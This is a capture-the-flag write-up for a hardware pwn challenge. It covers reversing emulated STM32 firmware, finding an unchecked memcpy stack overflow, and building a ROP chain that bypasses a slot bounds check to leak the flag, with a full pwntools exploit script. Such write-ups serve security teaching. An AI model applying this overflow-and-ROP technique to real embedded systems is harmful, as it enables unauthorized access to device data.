Level 9 - HWisntThatHardv2 (hardware pwn)

This challenge requires us to find a vulnerability in STM32 firmware and exploit it to read the flag. We are given an STM32 emulator to run the firmware, since we do not have access to the physical hardware. To better understand the challenge structure, we need to look at the config file, config.yaml:
cpu:
  svd: stm32f407.svd
  vector_table: 0x08000000
regions:
  - name: ROM
    start: 0x08000000
    load: csit_iot.bin
    size: 0x80000
  - name: RAM-CCM
    start: 0x10000000
    size: 0x18000
  - name: RAM
    start: 0x20000000
    size: 0x20000
framebuffers:
peripherals:
devices:
  spi_flash:
    - peripheral: SPI3
      jedec_id: 0xef4016
      file: ext-flash.bin
      size: 0x400000
  usart_probe:
    - peripheral: USART1
patches:
The firmware logic is in csit_iot.bin, which is loaded at address 0x08000000, and an external SPI flash backed by ext-flash.bin is attached to SPI3.
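To make the memory map easier to reason about, here is a small sketch that checks which configured region an address falls into. The region values are copied from config.yaml; the helper name `region_of` is my own and not part of the emulator.

```python
# Memory map copied from config.yaml: (name, start, size)
REGIONS = [
    ("ROM", 0x08000000, 0x80000),
    ("RAM-CCM", 0x10000000, 0x18000),
    ("RAM", 0x20000000, 0x20000),
]


def region_of(addr: int):
    """Return the name of the region containing addr, or None (hypothetical helper)."""
    for name, start, size in REGIONS:
        if start <= addr < start + size:
            return name
    return None


if __name__ == "__main__":
    for addr in (0x08000000, 0x0807FFFF, 0x08080000, 0x20000000):
        print(hex(addr), region_of(addr))
```

Any firmware code address we care about has to land in ROM, which is a quick way to sanity-check addresses copied out of a disassembler.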
If we look at ext-flash.bin, we see that the first 32 bytes are the real flag we're interested in, and the rest of the data consists of fake flags. Including the credits, there are 16 entries.
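The layout can be sketched as follows: a flash image is cut into 32-byte slots and each slot is printed as text. The helper names `split_slots` and `slot_text` are my own, and the sample image is synthetic rather than the real ext-flash.bin; the only assumption taken from the challenge is that entries are 32 bytes long with slot 0 first.

```python
SLOT_SIZE = 32  # each entry in the flash image is 32 bytes


def split_slots(image: bytes, slot_size: int = SLOT_SIZE) -> list[bytes]:
    """Cut a flash image into fixed-size slots (hypothetical helper)."""
    return [image[i:i + slot_size] for i in range(0, len(image), slot_size)]


def slot_text(slot: bytes) -> str:
    """Decode a slot as ASCII, dropping the zero padding at the end."""
    return slot.rstrip(b"\x00").decode("ascii", errors="replace")


if __name__ == "__main__":
    # Synthetic stand-in for ext-flash.bin: one "real" entry, then fakes.
    image = b"".join(
        text.ljust(SLOT_SIZE, b"\x00")
        for text in [b"TISC{real}", b"TISC{fake_1}", b"TISC{fake_2}"]
    )
    for index, slot in enumerate(split_slots(image)):
        print(index, slot_text(slot))
```

For the real file, one would read ext-flash.bin and pass its first 16 * 32 bytes to `split_slots`.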
Let's look at the Dockerfile:
FROM ubuntu
WORKDIR /tisc
RUN apt-get update && apt-get install -y socat
COPY csit_iot.bin .
COPY ext-flash.bin .
COPY stm32-emulator .
COPY stm32f407.svd .
COPY config.yaml .
ENTRYPOINT socat tcp-l:8000,fork,reuseaddr exec:"timeout 60s ./stm32-emulator config.yaml"
The emulator is run with the provided config file. Listing the emulator's options gives the following:
STM32 Emulator
USAGE:
stm32-emulator [OPTIONS] <CONFIG>
ARGS:
<CONFIG> Config file
OPTIONS:
-b, --busy-loop-stop
Stop emulation when the program reaches a busy loop
-c, --color <COLOR>
Colorize output [default: auto] [possible values: auto, always, never]
-d, --dump-stack <DUMP_STACK>
Dump stack at the end. Parameter is the number of words to print
-h, --help
Print help information
-i, --interrupt-period <INTERRUPT_PERIOD>
Run pending interrupts every N instructions Shorter is more correct, but is slower
[default: 1]
-m, --max-instructions <MAX_INSTRUCTIONS>
Maximum number of instructions to execute
-s, --stop-addr <STOP_ADDR>
Stop emulation when pc reaches this address
-v, --verbose
Verbosity. Can be repeated. -vvvv is the maximum
However, when I tried the different options, they didn't seem to actually work. I later found the stm32-emulator repo on GitHub, but it was not set up to accept user input from stdin. In other words, neither the provided emulator nor the one from GitHub worked perfectly, so I decided to start by reversing the binary.
Using my IDA Pro MCP setup with GitHub Copilot, I got a rough understanding of how the program works and learnt that it accepts two main types of input, both in JSON:
1. View the 32 bytes at a given slot from 1 to 15 inclusive. The request has the format
{"slot":x} (reads slot x)
The response looks something like
Slot 1 contains: [84,73,83,67,123,70,65,75,69,95,70,76,65,71,95,71,79,69,83,95,72,69,82,69,125,0,0,0,0,0,0,0]
2. Find how many bytes of a provided array match the slot. The request looks something like
{"slot":1,"data":[1,2,3,...]}
and the response looks something like
Checking...
Result: 1
where 1 is the number of positions at which our array matches the slot data.
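The two request types can be built with a couple of small helpers. This is a minimal sketch: the function names are my own, and terminating each request with a newline is an assumption based on how the exploit later sends its line.

```python
import json


def read_request(slot: int) -> bytes:
    """JSON line asking the firmware to print a slot (hypothetical helper)."""
    return json.dumps({"slot": slot}).encode() + b"\n"


def check_request(slot: int, data: list[int]) -> bytes:
    """JSON line asking the firmware to compare data against a slot."""
    return json.dumps({"slot": slot, "data": data}).encode() + b"\n"


if __name__ == "__main__":
    print(read_request(1))
    print(check_request(1, [84, 73, 83, 67]))
```

Note that `json.dumps` inserts a space after each colon and comma by default; the exploit at the end of this writeup sends JSON in that form.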
On reversing the binary, we identify a function main at address 0x8007900, which calls a function parse_command at address 0x8007260. main then has the following pseudocode:
if ( valid_command )
{
v13 = slot_index;
if ( (unsigned int)(slot_index - 1) <= 0xE )// 1 <= index <= 15
{
memset_(rx_byte, 0, 32);
spi_cmd[0] = 3;
spi_cmd[1] = __rev16(32 * v13);
gpio_write_pin(1073872896, 0x8000, 0);
spi_tx(&g_spi, spi_cmd, 4, -1);
spi_rx(&g_spi, rx_byte, 32, -1);
gpio_write_pin(1073872896, 0x8000, 1);
if ( has_user_data )
{
check_data_and_format_result((int)rx_byte, &v41);
if ( v41 )
mem_free(v41, v42 - v41);
}
else
{
memcpy_(g_outbuf, (int)"Slot ", 5);
appended = sb_append_uint(g_outbuf, v13);
memcpy_(appended, (int)" contains: [", 12);
p_slot_bytes = &slot_bytes;
while ( 1 )
{
v26 = (unsigned __int8)*++p_slot_bytes;
sb_append_uint(g_outbuf, v26);
if ( p_slot_bytes == &slot_bytes_end )
break;
memcpy_(g_outbuf, (int)",", 1);
}
v27 = memcpy_(g_outbuf, (int)"]", 1);
v28 = (int (__fastcall *)(int, int))g_outbuf;
v29 = *(_BYTE **)((char *)&g_outbuf[31] + *(_DWORD *)(g_outbuf[0] - 12));
if ( !v29 )
_throw_bad_alloc((int)v27);
if ( v29[28] )
{
v5 = (unsigned __int8)v29[39];
}
else
{
sub_800B34A(v29);
v28 = sub_8006C44;
v34 = *(int (__fastcall **)(int, int))(*(_DWORD *)v29 + 24);
if ( v34 != sub_8006C44 )
v5 = v34((int)v29, 10);
}
v30 = uart_write_buf(g_outbuf, v5, (int)v28);
uart_write_cstr(v30, v31);
}
if ( line_buf != (char *)line_sso )
mem_free(line_buf, line_sso[0] + 1);
goto LABEL_28;
}
v19 = memcpy_(g_outbuf, (int)"Out of bounds!", 14);
As you can see, the unsigned comparison ensures that the provided index is between 1 and 15 inclusive (an index of 0 wraps around to 0xFFFFFFFF and fails the check). So we can't directly read the flag at slot 0.
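The single unsigned comparison covers both ends of the range. A minimal Python model of it, assuming 32-bit arithmetic as on the Cortex-M target (the function name is mine):

```python
def passes_bounds_check(slot_index: int) -> bool:
    """Mirror of (unsigned int)(slot_index - 1) <= 0xE with 32-bit wraparound."""
    return ((slot_index - 1) & 0xFFFFFFFF) <= 0xE


if __name__ == "__main__":
    for slot in (-1, 0, 1, 15, 16):
        print(slot, passes_bounds_check(slot))
```

Subtracting 1 first means slot 0 becomes a huge unsigned value, so one comparison rejects 0, negative values and anything above 15.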
If there is user data, we enter the function check_data_and_format_result at 0x800023c; otherwise we enter the else block, which simply prints the 32 bytes of slot data.
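It also helps to see which bytes main sends to the flash before reading a slot. The sketch below rebuilds the 4-byte buffer from the pseudocode, assuming spi_cmd is an array of two little-endian 16-bit values (the asm stores them with STRH). Reading 0x03 as a flash read command followed by a 24-bit address is my interpretation, not something the firmware states.

```python
import struct


def rev16(value: int) -> int:
    """Byte-swap a 16-bit value, like REV16 applied to one halfword."""
    value &= 0xFFFF
    return ((value << 8) | (value >> 8)) & 0xFFFF


def spi_read_command(slot: int) -> bytes:
    """Bytes passed to spi_tx: two little-endian halfwords, as stored by STRH."""
    return struct.pack("<HH", 3, rev16(32 * slot))


if __name__ == "__main__":
    for slot in (0, 1, 15):
        print(slot, spi_read_command(slot).hex())
```

For slot 1 this gives the bytes 03 00 00 20, i.e. command 0x03 with address 0x000020, so slot n sits at flash offset 32 * n and slot 0 is at offset 0.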
Now let's look at check_data_and_format_result:
int __fastcall check_data_and_format_result(int a1, _DWORD *a2)
{
int num_matches; // r5
_DWORD *v3; // r0
_BYTE *v4; // r6
_DWORD *v5; // r4
int v6; // r1
int v7; // r0
int (*v9)(); // r3
num_matches = j_comparison(a1, a2);
memcpy_(g_outbuf, "Result: ", 8);
v3 = (_DWORD *)sb_append_uint(g_outbuf, num_matches);
v4 = *(_BYTE **)((char *)v3 + *(_DWORD *)(*v3 - 12) + 124);
if ( !v4 )
_throw_bad_alloc(v3);
v5 = v3;
if ( v4[28] )
{
v6 = (unsigned __int8)v4[39];
}
else
{
sub_800B34A(v4);
v9 = *(int (**)())(*(_DWORD *)v4 + 24);
v6 = 10;
if ( v9 != sub_8006C44 )
v6 = ((int (__fastcall *)(_BYTE *, int))v9)(v4, 10);
}
v7 = uart_write_buf(v5, v6);
uart_write_cstr(v7);
return num_matches;
}
Let's look at the comparison functions:
int __fastcall j_comparison(_DWORD *a1, _DWORD *a2)
{
return comparison(a1, a2);
}
int __fastcall comparison(_DWORD *a1, _DWORD *a2)
{
int similarities; // r5
char *v4; // r0
char *v5; // r3
int v6; // r1
int v7; // t1
int v8; // t1
int *v9; // r0
int (__fastcall *v10)(int, int); // r2
_BYTE *v11; // r4
int v12; // r1
int *v13; // r0
int v14; // r1
int (__fastcall *v16)(int, int); // r3
char v17; // [sp+0h] [bp-31h] BYREF
int v18; // [sp+1h] [bp-30h] BYREF
char v19; // [sp+20h] [bp-11h] BYREF
memcpy_(&v18, *a2, a2[1] - *a2);
similarities = 0;
v4 = (char *)a1 - 1;
v5 = &v17;
// count number of array similarities
do
{
v7 = (unsigned __int8)*++v5;
v6 = v7;
v8 = (unsigned __int8)*++v4;
if ( v6 == v8 )
++similarities;
}
while ( &v19 != v5 );
v9 = memcpy_(g_outbuf, (int)"Checking... ", 12);
v11 = *(_BYTE **)((char *)&g_outbuf[31] + *(_DWORD *)(g_outbuf[0] - 12));
if ( !v11 )
_throw_bad_alloc((int)v9);
if ( v11[28] )
{
v12 = (unsigned __int8)v11[39];
}
else
{
sub_800B34A(v11);
v10 = sub_8006C44;
v16 = *(int (__fastcall **)(int, int))(*(_DWORD *)v11 + 24);
v12 = 10;
if ( v16 != sub_8006C44 )
v12 = v16((int)v11, 10);
}
v13 = uart_write_buf(g_outbuf, v12, (int)v10);
uart_write_cstr(v13, v14);
return similarities;
}
int __fastcall memcpy_(int result, char *a2, int a3)
{
char *v3; // r2
int i; // r3
char v5; // t1
v3 = &a2[a3];
for ( i = result - 1; a2 != v3; ++i )
{
v5 = *a2++;
*(_BYTE *)(i + 1) = v5;
}
return result;
}
At this point I tried fuzzing the program, and the first thing I tried was a data array longer than 32 bytes. That crashed the program, which made me suspect that a long array was corrupting memory somewhere. I then asked ChatGPT to identify potential buffer overflow vulnerabilities, and learnt that the memcpy_ call in the comparison function is vulnerable: the copy length is a2[1] - *a2, which is the length of the data we supplied, and it is never checked against the 32-byte stack buffer. If the array has more than 32 bytes, memcpy_ keeps writing past the buffer that starts at v18. The pseudocode places v18 at sp+1, that is, 1 byte above the stack pointer. Thus we are able to overflow into the saved return address of comparison (the value its epilogue pops into PC) and control the program's execution flow.
Let's look at the function epilogue of comparison:
LDR R0, =g_outbuf
BL uart_write_buf
BL uart_write_cstr
MOV R0, R5
ADD SP, SP, #0x24 ; '$'
POP {R4,R5,PC}
Although the pseudocode shows v18 at sp+1, I found by trial and error that the data is actually copied to sp. On return, the function adds 0x24 to SP and then pops R4, R5 and PC, so the distance between the memcpy_ target and the saved PC is 0x24 + 2 * 4 = 44 bytes (2 * 4 because two registers are popped first, and each is 32 bits, i.e. 4 bytes, wide).
Therefore, after 44 bytes of padding, the next 4 bytes of the array overwrite the saved PC.
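The offset arithmetic can be checked with a small model of the epilogue. This is only a sketch: it assumes the copy starts exactly at SP, as found by trial and error above, and the names `PC_OFFSET` and `popped_registers` are mine.

```python
import struct

FRAME_SIZE = 0x24          # ADD SP, SP, #0x24
SAVED_REGS = ("r4", "r5")  # popped before PC by POP {R4,R5,PC}
PC_OFFSET = FRAME_SIZE + 4 * len(SAVED_REGS)


def popped_registers(payload: bytes) -> dict:
    """Values the epilogue would load if payload starts at SP."""
    words = struct.unpack_from("<3I", payload, FRAME_SIZE)
    return dict(zip(SAVED_REGS + ("pc",), words))


if __name__ == "__main__":
    payload = b"A" * PC_OFFSET + struct.pack("<I", 0xDEADBEEF)
    print(PC_OFFSET)
    regs = popped_registers(payload)
    print({name: hex(value) for name, value in regs.items()})
```

Here `PC_OFFSET` evaluates to 44, and the model also shows that bytes 36 to 43 of the payload end up in R4 and R5.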
Now, to get the flag we simply need to read slot 0. Let's look again at the relevant part of main for reading slot data:
v13 = slot_index;
if ( (unsigned int)(slot_index - 1) <= 0xE )// 1 <= index <= 15
{
memset_(rx_byte, 0, 32);
spi_cmd[0] = 3;
spi_cmd[1] = __rev16(32 * v13);
gpio_write_pin(1073872896, 0x8000, 0);
spi_tx(&g_spi, spi_cmd, 4, -1);
spi_rx(&g_spi, rx_byte, 32, -1);
gpio_write_pin(1073872896, 0x8000, 1);
if ( has_user_data )
{
check_data_and_format_result((int)rx_byte, &v41);
if ( v41 )
mem_free(v41, v42 - v41);
}
else
{
memcpy_(g_outbuf, (int)"Slot ", 5);
appended = sb_append_uint(g_outbuf, v13);
memcpy_(appended, (int)" contains: [", 12);
...
So our objective is to have slot_index = 0 and has_user_data = 0.
How do we achieve slot_index = 0? We can jump into the middle of main, just after the <= 0xE check, having first set the registers that carry slot_index to 0 using Return Oriented Programming (ROP). Let's look at the corresponding asm:
LDR R4, [SP,#0xA8+slot_index]
SUBS R3, R4, #1
CMP R3, #0xE <- comparison!
BHI.W loc_8007C20
if not out of bounds:
MOVS R2, #0x20 ; ' ' <- instruction at address 0x8007b14
MOVS R1, #0
ADD R0, SP, #0xA8+var_40
BL memset_
MOVS R1, #3
LSLS R3, R4, #5
REV16 R3, R3
STRH.W R1, [SP,#0xA8+var_8C]
LDR R0, =0x40020000
STRH.W R3, [SP,#0xA8+var_8A]
MOVS R2, #0
MOV.W R1, #0x8000
...
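So we need to execute the instruction at address 0x8007b14 with the slot registers zeroed. In the listing, the slot index itself lives in R4 (it is shifted by LSLS R3, R4, #5 to build the flash address), and R4 is restored from our payload by the POP {R4,R5,PC} at the end of comparison, so zero bytes in that position take care of it. I also zeroed R3, the register used in the bounds check, by looking for a pop {R3, ..., PC} gadget. Note that in ARM Thumb mode, every code address we place on the stack must have its lowest bit set (address | 1).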
I found a pop {R3, PC} gadget at address 0x0801058e.
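Setting the Thumb bit and packing the address as a little-endian word can be sketched like this. The helper name `thumb_addr` is mine; the two addresses are the gadget and the target inside main from this writeup.

```python
import struct


def thumb_addr(addr: int) -> bytes:
    """Little-endian word for a Thumb code address, with bit 0 set."""
    return struct.pack("<I", addr | 1)


if __name__ == "__main__":
    print(list(thumb_addr(0x0801058E)))  # pop {r3, pc} gadget
    print(list(thumb_addr(0x08007B14)))  # instruction after the bounds check
```

The resulting byte lists are the values that go into the JSON data array in place of the saved PC.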
The next problem: how do we set has_user_data = 0? Well, has_user_data is stored on the stack of main at SP+0x5C, so we can overwrite it by extending our array payload.
So the final ROP chain outline will be something like:
1. Return to 0x0801058f to pop R3 and PC.
2. Return to the middle of main at address 0x8007b15, which now treats our slot as 0 since the slot registers (R4 from the epilogue's pop, R3 from the gadget) hold 0.
3. Overwrite the byte at address sp+0x5C with \x00 to set has_user_data = 0.
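The outline above can be turned into bytes with struct, without needing pwntools. This is a sketch under the offsets worked out in this writeup; the constant and function names are my own.

```python
import struct

POP_R3_PC = 0x0801058E         # pop {r3, pc} gadget
MAIN_AFTER_CHECK = 0x08007B14  # first instruction after the bounds check
HAS_USER_DATA_OFFSET = 0x5C    # offset from SP once execution is back in main


def build_payload() -> list[int]:
    """Return the JSON-ready list of byte values for the overflow."""
    chain = b"\x00" * 0x24                            # comparison's local frame
    chain += struct.pack("<II", 0, 0)                 # r4 = 0, r5 = 0
    chain += struct.pack("<I", POP_R3_PC | 1)         # pc -> gadget (Thumb bit set)
    chain += struct.pack("<I", 0)                     # r3 = 0
    chain += struct.pack("<I", MAIN_AFTER_CHECK | 1)  # pc -> middle of main
    chain += b"\x00" * HAS_USER_DATA_OFFSET           # padding up to has_user_data
    chain += b"\x00"                                  # has_user_data = 0
    return list(chain)


if __name__ == "__main__":
    payload = build_payload()
    print(len(payload))
    print(payload[44:56])
```

Building the chain from named constants makes it easier to adjust a single offset if the layout turns out to be slightly different.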
Below is my full exploit:
from pwn import *
import json

# Remote target runs the firmware and bridges UART over TCP
p = remote("chals.tisc25.ctf.sg", 51728)
context.log_level = 'debug'

pl = [0] * 32  # fills the 32-byte compare buffer
pl += [0] * 4  # rest of the 0x24-byte stack frame
# the epilogue pops r4, r5, pc
pl += [0, 0, 0, 0, 0, 0, 0, 0]  # r4 = 0, r5 = 0
pl += [0x8f, 0x05, 0x01, 0x08]  # pc -> pop {r3, pc} gadget at 0x0801058e (Thumb bit set)
pl += [0, 0, 0, 0]  # r3 = 0
pl += [0x15, 0x7b, 0x00, 0x08]  # pc -> 0x8007b14, middle of main (Thumb bit set)
pl += [0] * 0x5c  # padding up to has_user_data
pl += [0]  # has_user_data = 0

data = {"slot": 1, "data": pl}
p.sendline(json.dumps(data).encode())
print(p.recvrepeat(1))
p.close() # TISC{3mul4t3d_uC_pwn3d}
# Slot 0 contains: [84,73,83,67,123,51,109,117,108,52,116,51,100,95,117,67,95,112,119,110,51,100,125,0,0,0,0,0,0,0,0,0]
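To turn the firmware's reply back into text, the byte list can be parsed and decoded. A minimal sketch, assuming the reply line has the "Slot N contains: [...]" shape shown above (the function name is mine):

```python
import json


def decode_slot_line(line: str) -> str:
    """Turn 'Slot N contains: [..]' into the ASCII text stored in the slot."""
    values = json.loads(line[line.index("["):])
    return bytes(values).rstrip(b"\x00").decode("ascii")


if __name__ == "__main__":
    line = (
        "Slot 0 contains: [84,73,83,67,123,51,109,117,108,52,116,51,100,"
        "95,117,67,95,112,119,110,51,100,125,0,0,0,0,0,0,0,0,0]"
    )
    print(decode_slot_line(line))  # prints TISC{3mul4t3d_uC_pwn3d}
```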